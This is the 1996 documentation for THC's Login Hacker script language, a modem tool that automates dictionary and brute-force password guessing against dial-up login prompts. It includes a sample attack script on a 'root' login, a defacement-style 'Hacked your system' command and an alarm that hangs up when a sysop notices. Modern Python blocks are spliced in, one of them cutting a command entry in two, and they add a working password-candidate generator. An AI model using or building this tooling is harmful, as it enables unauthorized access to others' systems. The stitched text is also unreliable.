The Hacker's Choice
Part I - The Login Hacker
(c) 1996 by van Hauser/THC of L.o.r.E. BBS
-----------------------------------------------------------------------------

The Script Documentation

This is the Login Hacker, the first release of the THC Project of L.o.r.E.

--->>> READ THE NORMAL DOCUMENTATION FIRST ! <<<---

For easy targets you don't need this script language; you can use the menu
to select everything you like. For more difficult targets you need this:
the Login Hacker Script Language. It is easy to use. It is like the script
language of any terminal software, but it has special possibilities for
hacking.

Part I - The Structure

Everything that begins with a ";" is a comment.
Everything that begins with a ":" is a jump mark for GOTO commands.

Then there are 4 lines that start with a "#". Each marks the beginning of a
special part of the script:

  #DEFINE     - where the variables are defined.
  #NOCARRIER  - a special part which is jumped to automatically if the
                carrier gets lost without purpose (the HANGUP command is on
                purpose, anything else is not ;-) ).
  #START      - where the actual script starts.
  #END        - marks the end of the script.

*******************************************************************************
If you get an ERROR when compiling, there is a .BAK file in the same
directory. Look into it and compare the error message with the output there.

There are two types of error messages produced while compiling:

WARNING messages - important to take a look at, but the compiler compiles
                   the script anyway and it MAY run without problems. This
                   type is produced when, for example, the specified
                   dictionary is not found. Maybe you didn't copy it yet.

ERROR messages   - a critical error. The compiler terminates at once. Check
                   the error message, the .BAK file and the original file to
                   correct it.
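The structural rules above (comment and jump-mark prefixes, the four "#"
sections in order, the two required variables, WARNING versus ERROR) are
easy to get wrong in a long script. The following checker is an added
example, not part of the Login Hacker package: it parses a script the way
the compiler is described to, and reports ERRORs (which would stop
compilation) separately from WARNINGs (a missing dictionary file). The
embedded script is a constructed sample; it reuses the logfile, phone number
and dictionary path that this documentation uses as examples, and the login
sequence in it is an assumption. The message wording is this example's own.

```python
import os
import re

# Constructed sample script (not from the original documentation). The
# logfile, phone number and dictionary path are the example values this
# documentation uses; the login sequence itself is an assumption.
SAMPLE_SCRIPT = r"""
; dictionary attack on a unix login prompt (constructed example)
#DEFINE
LOGFILE=C:\OUTPUT\NY-SYS5.LOG
PHONE_NR=1-800-WHO-CARES
DIC(1)=C:\HACKING\DICTIONA.RY\BAD_PWS.DIC
DIAL_TRIES=3
#NOCARRIER
LOG(Carrier lost after $LOGIN_TRIED login tries - redialing)
GOTO(#START)
#START
DIAL
ALARM(chat,GOTO(#END))
:1
WAIT4STRING(15,^M,2,GOTO(#NOCARRIER),ogin:)
SEND(root)
WAIT4STRING(10,^M,2,GOTO(1),word:)
SEND_NEXT_DIC(1)
WAIT4STRING(10,^M,1,GOTO(2),ogin:)
GOTO(1)
:2
LOG(No new login prompt after sending $DIC(1) - check $LOGFILE)
GOTO(#END)
#END
"""

SECTIONS = ["#DEFINE", "#NOCARRIER", "#START", "#END"]
REQUIRED = ["LOGFILE", "PHONE_NR"]
# Only the variables Part II lists may appear in #DEFINE.
DEFINE_NAME = re.compile(
    r"^(LOGFILE|PHONE_NR|INIT_MODEM|INIT_DATA|DIAL_TRIES|LOGIN_TRIES"
    r"|(FROM_)?(DIC|BRUTE)\([123]\))$")
# Every command that takes a jump mark, also when nested in WAIT4STRING/ALARM/IF.
JUMP = re.compile(r"(GOTO|GOSUB|CHECK4CARRIER|CHECK4OUTPUT)\(([^)]*)\)")


def check_script(text):
    """Return (errors, warnings). ERRORs would stop the compiler; WARNINGs
    (here: a dictionary file that does not exist) would not."""
    errors, warnings = [], []
    seen, marks, defines, body = [], {}, {}, []
    section = None
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith(";"):
            continue                                  # blank line or comment
        if line.startswith("#"):
            expected = SECTIONS[len(seen)] if len(seen) < 4 else None
            if line not in SECTIONS:
                errors.append(f"line {n}: unknown section {line}")
            elif line != expected:
                errors.append(f"line {n}: {line} out of order (expected {expected})")
            else:
                seen.append(line)
            section = line
        elif section is None or section == "#END":
            errors.append(f"line {n}: text outside the #DEFINE..#END sections")
        elif section == "#DEFINE":
            name, sep, value = line.partition("=")
            if not sep or not DEFINE_NAME.match(name):
                errors.append(f"line {n}: {name} is not a #DEFINE variable")
            else:
                defines[name] = value
        elif line.startswith(":"):                     # jump mark, 1..240 only
            if not line[1:].isdigit() or not 1 <= int(line[1:]) <= 240:
                errors.append(f"line {n}: jump mark must be a number 1-240")
            elif line[1:] in marks:
                errors.append(f"line {n}: duplicate jump mark {line}")
            else:
                marks[line[1:]] = n
        else:
            body.append((n, line))
    for s in SECTIONS:
        if s not in seen:
            errors.append(f"missing section {s}")
    for var in REQUIRED:
        if var not in defines:
            errors.append(f"required variable {var} not defined")
    for name, value in defines.items():
        if name.startswith("DIC(") and not os.path.exists(value):
            warnings.append(f"{name}: dictionary {value} not found")
    for n, line in body:
        for cmd, target in JUMP.findall(line):
            if target in ("ON", "OFF") and cmd.startswith("CHECK4"):
                continue                              # switches, not jumps
            if target.startswith("#"):
                if target not in SECTIONS[1:]:
                    errors.append(f"line {n}: cannot jump to {target}")
                elif cmd == "GOSUB" and target == "#END":
                    errors.append(f"line {n}: GOSUB(#END) is not allowed")
            elif target not in marks:
                errors.append(f"line {n}: jump to undefined mark {target}")
    return errors, warnings


if __name__ == "__main__":
    errs, warns = check_script(SAMPLE_SCRIPT)
    for w in warns:
        print("WARNING", w)
    for e in errs:
        print("ERROR", e)
```

Run as-is it reports one WARNING (the dictionary path does not exist on
the machine running the check) and no ERRORs; feed it a script with a
misordered section or a GOTO to a mark that is never declared and those
come back as ERRORs, which is the distinction the compiler makes.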
*******************************************************************************

-------------------------------------------------------------------------------
Part II - The Definitions -> #DEFINE

In this part you may ONLY declare the values of the variables. All variables
are optional EXCEPT LOGFILE and PHONE_NR. All variables are discussed here
with all their possibilities. You may NOT define other variables of your own
here!

#DEFINE

LOGFILE=FILENAME
  The logfile to which all output is written.
  ** This is one of the two variables which MUST be used. **
  Example : LOGFILE=C:\OUTPUT\NY-SYS5.LOG

PHONE_NR=NUMBER
  The PHONE_NR variable is used by the DIAL command. It may contain letters
  as well as digits!
  ** This is the second variable that MUST be used. **
  Note : If your modem needs pulse dialing, put a "P" in front of the number!
  Example : PHONE_NR=1-800-WHO-CARES

INIT_MODEM=STRING
  If you need a special modem init string, use this variable. Don't put the
  "AT" in front! If not specified, the standard THC_Login_Hacker setup entry
  is used.
  Example : INIT_MODEM=Z   (that would be "AT Z")

INIT_DATA=STRING
  This initializes the data channel: data bits, parity and stop bits. Common
  values are 8N1 and 7E1. If not specified, the standard THC_Login_Hacker
  setup entry is used. It must consist of exactly 3 characters:
    7/8 + E/P/N + 1/2
  The first is the number of data bits, 7 or 8. The second is the parity
  setting: P for Parity, E for Even or N for None. The third is the number
  of stop bits, 1 or 2.

DIAL_TRIES=NUMBER
  The maximum number of dial attempts the script makes. The number may be
  between 0 and 65535. Zero means unlimited! If the number is reached, a
  HANGUP follows and a comment is written to the logfile.
  NOTE : If NOT specified in the script, the setting from LOGINH.CFG is used!
  Example : DIAL_TRIES=3
  Standard : 0

LOGIN_TRIES=NUMBER
  The maximum number of login tries the script makes. It may be between 0
  and 2300000000. Zero means unlimited. Note that if a dictionary file
  reaches EOF, the script automatically hangs up and terminates. A login try
  is counted each time a SEND_NEXT_DIC or NEXT_DIC command is executed, or
  the corresponding BRUTE command.
  NOTE : If NOT specified in the script, the setting from LOGINH.CFG is used!
  Example : LOGIN_TRIES=0
  Standard : 0

DIC(NUMBER)=FILENAME
  Specifies a dictionary to use in the script. DIC entries are pointers to
  dictionary files. You may have up to 3 dictionaries, from DIC(1) to DIC(3).
  You use them with the commands SEND_NEXT_DIC(1), SEND_DIC(1) and
  NEXT_DIC(1); more on how to use them later.
  Example : DIC(1)=C:\HACKING\DICTIONA.RY\BAD_PWS.DIC

FROM_DIC(NUMBER)=STRING
  Defines from which word on the dictionary is used.
  Example : FROM_DIC(1)=Tracy
  This sends every word from "Tracy" on in dictionary number 1.

BRUTE(NUMBER)=STRING,NUMBER,NUMBER,NUMBER
  Specifies a brute force generator to use in the script. Now for the
  hardcore part of this program: the brute force option. It is very
  flexible, as you will soon see. The options of the BRUTE variable are
  divided into 4 parts, each separated by a ",":

  (1) The first tells which character sets are used for brute forcing:
        a = lowercase letters
        A = uppercase letters
        1 = numbers
        $ = special characters
        ^ = control characters
      "A1$" would be uppercase letters, numbers and special characters.
      ALL is a synonym for the WHOLE ASCII table!
  (2) The second tells how many different types must be present for a
      generated word to be valid. "Types" means the character sets of (1).
      A value of 1 means EVERY generated word is okay; with a value of 2
      there must be, for example, at least one uppercase letter and one
      number in the generated word for it to be valid. (A value of 0 is not
      possible.)
  (3) The third is the minimum length of a valid brute force password.
  (4) The fourth is the maximum length.
  NOTE : Minimum length is 1 - Maximum length is 12 !
  Again you may have up to 3 brute force generators (BRUTE(2) etc.), and if
  one reaches its end the script finishes. Commands to use later are:
  NEXT_BRUTE(1), SEND_NEXT_BRUTE(1), SEND_BRUTE(1).
  Example : BRUTE(1)=a,1,1,6
  This initializes brute force generator number 1 with the following data:
    * lowercase letters only
    * at least one of the character sets must be present in a valid
      generated word ("1" means every word will do)
    * minimum length of a valid word is 1
    * maximum length of a valid word is 6

FROM_BRUTE(NUMBER)=STRING
  Starts the brute force generator with this initial value. If started with
  a 4-character string while scanning lengths 1-8, lengths 1-3 won't be
  checked. The entry is incremented from the right, that is: first aaaa,
  then aaab, then aaac etc.
  Example : FROM_BRUTE(1)=2527

-------------------------------------------------------------------------------
PART III - The #NOCARRIER Section

As said before, this is the part which is executed when you lose the carrier
and did not use the HANGUP command.

NOTE that it terminates the script if you don't end this part with
GOTO(#START), GOTO(1) etc.!! The DIAL_TRIES setting ISN'T checked here ...
remember that you need to dial the system again. The commands are not
listed here; look in the #START section.

#NOCARRIER

-------------------------------------------------------------------------------
PART IV - The #START Section

This is where you program the algorithm to hack a system. Every command is
presented here ... so read carefully!

#START

LOG(STRING)
  With the LOG() command you write something into the logfile. It can be any
  text. Variables MUST have a "$" sign in front of them and MUST be
  surrounded by spaces, "(" or ")". Every LOG command automatically writes
  an ENTER at the end.
  Example : LOG(Beginning on $DATE * $TIME)
  This prints "Beginning on 24-12-95 * 23:00".

LOG_(STRING)
  Same as above but doesn't write a CRLF (end of line) after the text.
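The BRUTE(n) and FROM_BRUTE(n) definitions of Part II specify a generator
(character classes, how many classes a candidate must draw from, length
range, optional starting word, incremented from the right) without showing
the candidates it produces. The following is an added example that
reimplements those rules in Python so you can enumerate or count the
candidates before committing a modem session to them; it is not the Login
Hacker's own generator. Assumptions, since the documentation does not state
them: the alphabet is the classes concatenated in the order you write them,
the starting word of FROM_BRUTE is itself sent, "^" means ASCII 0x01-0x1F,
and ALL is treated as printable ASCII 0x20-0x7E.

```python
import itertools
import string

# Character classes named in BRUTE(n)=classes,types,min,max. Which bytes the
# "^" class and ALL cover is not spelled out in the documentation; the
# ranges below are assumptions for this example.
CHARSETS = {
    "a": string.ascii_lowercase,
    "A": string.ascii_uppercase,
    "1": string.digits,
    "$": string.punctuation,
    "^": "".join(chr(c) for c in range(1, 32)),
}
ALL = "".join(chr(c) for c in range(0x20, 0x7F))


def parse_brute(spec):
    """Split 'aA1,2,1,6' into (charsets, types, min_len, max_len) and apply
    the limits the documentation states (types >= 1, 1 <= min <= max <= 12)."""
    classes, types, lo, hi = spec.split(",")
    types, lo, hi = int(types), int(lo), int(hi)
    sets = [ALL] if classes == "ALL" else [CHARSETS[c] for c in classes]
    if not 1 <= lo <= hi <= 12:
        raise ValueError("length must satisfy 1 <= min <= max <= 12")
    if not 1 <= types <= len(sets):
        raise ValueError("types must be between 1 and the number of classes")
    return sets, types, lo, hi


def brute(spec, start=None):
    """Yield every valid candidate of BRUTE(n)=spec in generator order.

    The alphabet is the classes concatenated in the order given; words are
    incremented from the right (aaaa, aaab, aaac, ...). `start` plays the
    role of FROM_BRUTE(n): generation begins at that word (inclusive) and
    all shorter lengths are skipped.
    """
    sets, types, lo, hi = parse_brute(spec)
    alphabet = "".join(sets)
    if start is not None:
        if not lo <= len(start) <= hi:
            raise ValueError("FROM_BRUTE word length outside min/max")
        lo = len(start)
    for length in range(lo, hi + 1):
        if start is not None and length == len(start):
            idx = [alphabet.index(ch) for ch in start]  # ValueError if not in alphabet
        else:
            idx = [0] * length
        while True:
            word = "".join(alphabet[i] for i in idx)
            # "types": the word must contain characters from at least that
            # many of the selected classes.
            if sum(any(ch in s for ch in word) for s in sets) >= types:
                yield word
            # odometer step: rightmost position moves fastest
            pos = length - 1
            while pos >= 0 and idx[pos] == len(alphabet) - 1:
                idx[pos] = 0
                pos -= 1
            if pos < 0:
                break
            idx[pos] += 1


def first_n(spec, n, start=None):
    """The first n candidates the generator would send."""
    return list(itertools.islice(brute(spec, start), n))


def count_candidates(spec, start=None):
    """How many strings the generator will send before it reaches its end,
    i.e. the size of the search the script commits to."""
    return sum(1 for _ in brute(spec, start))


if __name__ == "__main__":
    print(first_n("aA1,2,2,2", 5))          # first words needing two classes
    print(count_candidates("1,1,1,4", "2527"))   # FROM_BRUTE(1)=2527, digits, 1-4
```

Counting first is worth the few seconds: at a handful of tries per minute
over a modem, BRUTE(1)=a,1,1,6 is about 321 million candidates, which no
DIAL_TRIES or LOGIN_TRIES setting makes practical; the "types" field only
shrinks that space, it never widens it.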
:NUMBER
  Every line that begins with a ":" is a GOTO mark. It can only be a number!
  You may have up to 240 marks (only with the numbers 1 to 240, no others).
  You may jump to such a mark with the GOTO, GOSUB, CHECK4OUTPUT and
  CHECK4CARRIER commands.
  Example : :1
  This specifies jump mark number 1 on this line.

GOTO(NUMBER)
  Jumps to the specified jump mark. You may also jump to #START, #NOCARRIER
  and #END.
  Example : GOTO(#END)   (this terminates the script)

GOSUB(NUMBER)
  With the GOSUB command you jump to a GOTO mark. Execution continues
  normally from there; when a RETURN command is encountered it jumps back to
  the point where the GOSUB command was executed. GOSUB(#END) is not allowed!
  Example : GOSUB(4)

RETURN
  Returns to the location of the last GOSUB command executed and continues
  normally. If a RETURN is encountered without a GOSUB return address in the
  buffer, it is ignored. You may have up to 255 GOSUBs in the buffer.
  Example : RETURN

CHECK4CARRIER(NUMBER)
  Checks whether the modem has a carrier. If NOT, it jumps to the specified
  jump mark. If YES, it sets the internal connect variable to TRUE so that
  NO CARRIER conditions are checked for. You may also jump to #NOCARRIER,
  #START and #END.
  It is also possible to just turn the checking ON or OFF. If
  CHECK4CARRIER(ON) is used instead of CHECK4CARRIER with a jump mark, it
  does a carrier detect check and, if no carrier is present, jumps to
  #NOCARRIER.
  This command is useful ONLY when you first did CHECK4CARRIER(OFF), or when
  you don't use the DIAL command to connect to your target (e.g. you let the
  SCAVENGER DIALER do this).
  Examples : CHECK4CARRIER(#NOCARRIER)
             CHECK4CARRIER(5)
             CHECK4CARRIER(ON)
             CHECK4CARRIER(OFF)

CHECK4OUTPUT(NUMBER)
  Like the ALARM function below: if OUTPUT from the modem is detected it
  immediately jumps to the specified jump mark. You may also jump to
  #NOCARRIER, #START and #END.
  It is also possible to just turn the checking OFF (that is, disable a
  previously specified output check).
  Examples : CHECK4OUTPUT(#NOCARRIER)
             CHECK4OUTPUT(5)
             CHECK4OUTPUT(OFF)

DIAL
  Dials the number specified in PHONE_NR. If still connected to a system, it
  hangs up first.
  Example : DIAL

HANGUP
  Hangs up / drops the carrier, etc.
  Example : HANGUP

WAIT4STRING(NUMBER,STRING,NUMBER,COMMAND,STRING)
  Now that's the most important command in this script language. It waits
  for a particular string in the modem output. If it is encountered, the
  script continues; if not, after the timeout a specified string is sent to
  the modem, and after a specified number of timeouts a command may be
  executed.
  NOTE : WAIT4STRING first checks whether the string is present in the
  CURRENT line. If not, it waits for it.
  The syntax : WAIT4STRING(a,b,c,d,e)
    a : After how many seconds a timeout occurs (0-255). 0 = unlimited: it
        waits until the TOTAL TIMEOUT (the script jumps to #NOCARRIER if no
        data comes from the modem for 5 minutes), OR the string is detected
        in the data stream at any time, OR the carrier gets lost.
    b : The string that is sent to the modem after a timeout.
    c : After how many total timeouts the failure command is executed.
        0 = never, 1 = at the first timeout, up to 255.
    d : The failure action command. It may be ANY command (or none) EXCEPT
        ALARM, WAIT4STRING and IF.
    e : The string to wait for! (Case sensitive!)
  Example : WAIT4STRING(15,^M,2,GOTO(1),ogin:)
  In this example it waits 15 seconds for the string "ogin:". If it is not
  encountered, a carriage return (^M) is sent to the modem and it waits
  another 15 seconds. If "ogin:" is still not encountered after that second
  timeout (c=2), the FAILURE command is triggered, which here means GOTO
  jump mark number 1.

LOG_SESSION_ON
  From this point on, anything sent from the modem is written to the
  logfile.
  Example : LOG_SESSION_ON

LOG_SESSION_OFF
  If writing the screen output to the logfile was active, it is no longer
  from this point on.
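Because WAIT4STRING(a,b,c,d,e) combines a per-attempt timeout, a retry
string, a failure count and the 5-minute total timeout, it helps to see the
five parameters acting on a concrete stream of modem output. The following
simulation is an added example, not code from the Login Hacker: it replays
a constructed transcript against a scripted fake modem in simulated time and
reports which way the command would exit. It also decodes the ^X
control-character notation described in Part VI, since b is usually ^M.
Assumptions where the documentation is silent: b is sent on every timeout,
d fires when the c-th timeout is counted (c=0 never fires it), and the
5-minute total timeout counts time without any data from the modem.

```python
import re

TOTAL_TIMEOUT = 300   # the 5-minute "no data from modem" limit -> #NOCARRIER
CARET = re.compile(r"\^(.)")


def decode_carets(text):
    """Turn the ^X notation of Part VI into real control characters:
    ^A..^Z -> 0x01..0x1A, ^[ ^\\ ^] -> 0x1B..0x1D, ^^ -> a literal '^'."""
    def repl(m):
        c = m.group(1)
        if c == "^":
            return "^"
        if "A" <= c <= "]":          # 'A' is 0x41 .. ']' is 0x5D
            return chr(ord(c) - 0x40)
        raise ValueError(f"unknown control character ^{c}")
    return CARET.sub(repl, text)


class FakeModem:
    """Scripted stand-in for the modem, constructed for this example: output
    chunks arrive at fixed simulated times (seconds); anything the script
    sends is recorded in .sent."""

    def __init__(self, events, current_line=""):
        self.events = sorted(events)        # [(arrival_time, text), ...]
        self.current_line = current_line
        self.sent = []

    def next_event(self, after):
        for t, text in self.events:
            if t > after:
                return t, text
        return None

    def feed(self, text):
        self.current_line = (self.current_line + text).rsplit("\n", 1)[-1]

    def send(self, data):
        self.sent.append(data)


def wait4string(modem, timeout, send_on_timeout, fail_after, target, now=0):
    """Simulate WAIT4STRING(a,b,c,d,e) with a=timeout, b=send_on_timeout,
    c=fail_after, e=target. Returns (outcome, time, timeouts) where outcome
    is 'found' (script continues), 'failed' (the failure command d would run
    now) or 'nocarrier' (no data for TOTAL_TIMEOUT, jump to #NOCARRIER)."""
    timeouts = 0
    seen = modem.current_line            # the CURRENT line is checked first
    if target in seen:
        return "found", now, 0
    last_data = now
    while True:
        deadline = last_data + TOTAL_TIMEOUT
        if timeout:
            deadline = min(deadline, now + timeout)
        ev = modem.next_event(now)
        if ev is not None and ev[0] <= deadline:
            now, chunk = ev
            last_data = now
            seen += chunk
            modem.feed(chunk)
            if target in seen:           # matched anywhere in the stream
                return "found", now, timeouts
            continue
        now = deadline                    # nothing arrived in time
        if now - last_data >= TOTAL_TIMEOUT:
            return "nocarrier", now, timeouts
        timeouts += 1
        modem.send(decode_carets(send_on_timeout))
        if fail_after and timeouts >= fail_after:
            return "failed", now, timeouts


if __name__ == "__main__":
    modem = FakeModem([(3, "Welcome to NY-SYS5\r\n"), (20, "login: ")])
    print(wait4string(modem, 15, "^M", 2, "ogin:"), [repr(s) for s in modem.sent])
```

With the transcript above, WAIT4STRING(15,^M,2,...,ogin:) times out once at
18 seconds, sends one carriage return, and then matches the prompt that
arrives at 20 seconds; remove the prompt and the same command fails at 33
seconds after two timeouts, while a=0 instead sits until 303 seconds and
exits the #NOCARRIER way.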
  Example : LOG_SESSION_OFF

SEND(STRING)
  The SEND command sends a string to the modem. You may also send variables
  here with a "$". It sends an ENTER (carriage return) at the end. If no
  string is specified, it just sends an ENTER.
  Example : SEND(echo Hacked your system Time : $TIME - Date : $DATE > HACKED.TXT)
  This sends "echo Hacked your system Time : 23:00 - Date : 24-12-95 > HACKED.TXT".

SEND_(STRING)
  Same as above but doesn't send the ^M character (ENTER) at the end. Useful
  if you just need to enter one character or want to enter the modem command
  mode with +++.
  Examples : SEND_(n)
             SEND_(+++)

SEND_NEXT_DIC(NUMBER)
  Moves the pointer forward to the next word in the dictionary and sends it
  to the modem.
  Example : SEND_NEXT_DIC(1)

SEND_DIC(NUMBER)
  Sends the current dictionary word to the modem.
  Example : SEND_DIC(1)

NEXT_DIC(NUMBER)
  Moves the pointer forward to the next word in the dictionary.
  Example : NEXT_DIC(1)

SEND_NEXT_BRUTE(NUMBER)
  Generates the next valid brute force string and sends it to the modem.
  Example : SEND_NEXT_BRUTE(1)

SEND_BRUTE(NUMBER)
  Sends the current brute force string to the modem.
  Example : SEND_BRUTE(1)

NEXT_BRUTE(NUMBER)
  Generates the next valid brute force string.
  Example : NEXT_BRUTE(1)

IF VARIABLE OPERATOR STRING THEN COMMAND
  The IF command isn't very flexible yet ... tell me what you need and it
  will be in the next version.
  SYNTAX : IF <variable> <operator> <string> THEN <command>
    <variable> may be anything mentioned in PART VI.
    <operator> may be "=" if it must be equal, "<" or ">" for smaller and
               greater, and "~" if the variable contains the string.
    <string>   may be any word. For "<" or ">", variable and string must be
               digit values!
    <command>  is executed when the condition is TRUE. Look at the command
               listing for WAIT4STRING to see what you can use.
  Example : IF STRING~ogin THEN GOTO(3)
  IF the CURRENT LINE (STRING) CONTAINS (~) the string "ogin" THEN goto jump
  mark number 3.

EXECUTE(STRING)
  Executes a DOS program. After the execution the script continues.
  You MAY include variables in the execution line. You may execute internal
  MS-DOS commands. Remember to put a "$" sign in front of variables, with
  only spaces or "(" and ")" before/after them.
  WARNING : If you want to execute programs while connected in the script,
  you MUST use a FOSSIL driver or the computer will lock up! (Has got
  something to do with the interrupts ...) Use X00.EXE E 2 before running
  LOGIN HACKER.
  Note : If the program to execute is in your PATH environment it will be
  found ... but better safe than sorry ;-)
  Examples : EXECUTE(C:\SB\VPLAY C:\SB\VOC\HACKED.VOC)
             EXECUTE(COPY $LOGFILE C:\HACKED)

ALARM(STRING,COMMAND)
  If a particular string from the modem is encountered at any point, this
  triggers the given command. Once an ALARM is set, it stays active until it
  is disabled with the command ALARM() or a new ALARM string or command is
  specified.
  The syntax : ALARM(string,command) or ALARM().
    STRING  : the string searched for in the data sent from the modem.
    COMMAND : the command to execute when it is encountered. Look at the
              command listing for WAIT4STRING to see what you can use.
  Useful for example if you want to hack a BBS where the SYSOP could break
  in for a chat to ask what you are doing. With this command you can
  automatically hang up and terminate the script.
  Example : ALARM(chat,GOTO(#END))

SET VARIABLE=STRING
  With this command you can set a variable in the #START or #NOCARRIER
  section. If a variable is a digit variable you may only set it to a digit
  value. You may set the following variables: STRING, DIAL_TRIED,
  LOGIN_TRIED, S_TMP, D_TMP.
  Example : SET D_TMP=3
  This sets the digit variable D_TMP to 3.

INC(DIGIT_VARIABLE)
  Increases the specified digit variable by 1. The command is only executed
  if the variable stays within its valid range after the addition.
  Valid for : DIAL_TRIES, DIAL_TRIED, LOGIN_TRIES, LOGIN_TRIED and D_TMP
  Example : INC(D_TMP)

DEC(DIGIT_VARIABLE)
  Decreases the specified digit variable by 1.
  The command is only executed if the variable stays within its valid range
  after the subtraction.
  Valid for : DIAL_TRIES, DIAL_TRIED, LOGIN_TRIES, LOGIN_TRIED and D_TMP
  Example : DEC(D_TMP)

WAIT(NUMBER)
  Waits until the specified number of seconds has passed. NUMBER must be
  between 1 and 255.
  Example : WAIT(10)

WAIT_(NUMBER)
  Waits until the specified number of milliseconds has passed. NUMBER must
  be between 1 and 65535.
  Example : WAIT_(500)   (half a second)

BEEP
  It makes a BEEP! Cool eh? ;-)

#END

-------------------------------------------------------------------------------
PART VI - Variables and Control Characters

Now I tell you all the variables that can be used with the SEND() or LOG()
command, and which additional variables you have here. As said before, to
print a variable to the modem or the logfile you must write a "$" in front
of it and there must be spaces around it.

Variables you can use are:
  - any of those specified in #DEFINE - but only the ones defined!
  - STRING       the last LINE sent from the modem
  - STRING2      the last 250 characters sent from the modem
  - DIAL_TRIED   the actual number of tries to dial the number
  - LOGIN_TRIED  the actual number of tries to log in
  - TIME         the actual time as hours and minutes (without ":"!)
                 Example : TIME=1505 means 15:05 (3:05 pm). If the minutes
                 are below 10 you must write a zero before them.
  - DATE         the actual date (in the format MMDD)
                 Example : DATE=503 means the 3rd of May. If the day is
                 below 10 you must write a zero before it.
  - DIC(1)       the actual entry of dictionary 1
  - BRUTE(2)     the actual string of brute force generator 2
  - S_TMP        a string variable you can use as you like
  - D_TMP        a digit variable you can use as you like

For the IF and SET commands: you may only use the variables above, NOT the
ones in #DEFINE (where would be the logic? Those are static constants, you
don't need to check them with IF!). You don't need the "$" in front of a
variable here. It is only needed for SEND, LOG and WAIT4STRING ...
Examples : IF TIME>1215 THEN GOTO(#END)   (if it's after 12:15 it exits)
           LOG($DIC(3))
           SEND($S_TMP)

Now for the special characters. You may write any CONTROL character in a
LOG, SEND or WAIT4STRING command with the "^" sign followed by the letter of
the control character. ENTER would be ^M. To print a normal "^" you must
write "^^" ... okay? You may use ^A to ^Z plus ^[ ^\ ^] and ^^.
Examples : SEND_(^D)

-------------------------------------------------------------------------------
#DEFINE

#NOCARRIER

#START

#END
-------------------------------------------------------------------------------
For suggestions or bug reports, call L.o.r.E. BBS ++49-(0)69-823282
  Login    : THC
  Password : THC
to write a comment to the sysop, leech any THC release or get one of the
things this board distributes, for example the SCAVENGER Dialer, VLAD
Magazine etc.

Call ARRESTED DEVELOPMENT (see THC.NFO for the number) and write to van
Hauser, OR write me an email ... address + public PGP key below.
-------------------------------------------------------------------------------
van Hauser's Public Key Block for vh@campus.de :

van Hauser/THC L.o.r.E. BBS
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.1

mQCNAzB6PNQAAAEEALx5p2jI/2rNF9tYandxctI6jP+ZJUcGPTs7QTFtF2c+zK9H
ElFfvsC0QkaaUJjyTq7TyII18Na1IuGj2duIHTtG1DTDOnbnZzIRsXndfjCIz5p+
Dt6UYhotbJhCQKkxuIT5F8EZpLTAL88WqaMZJ155uvSTb9uk58pv3AI7GIx9AAUT
tBp2YW4gSGF1c2VyL1RIQyBvZiBMT1JFIEJCUw==
=6UhL
-----END PGP PUBLIC KEY BLOCK-----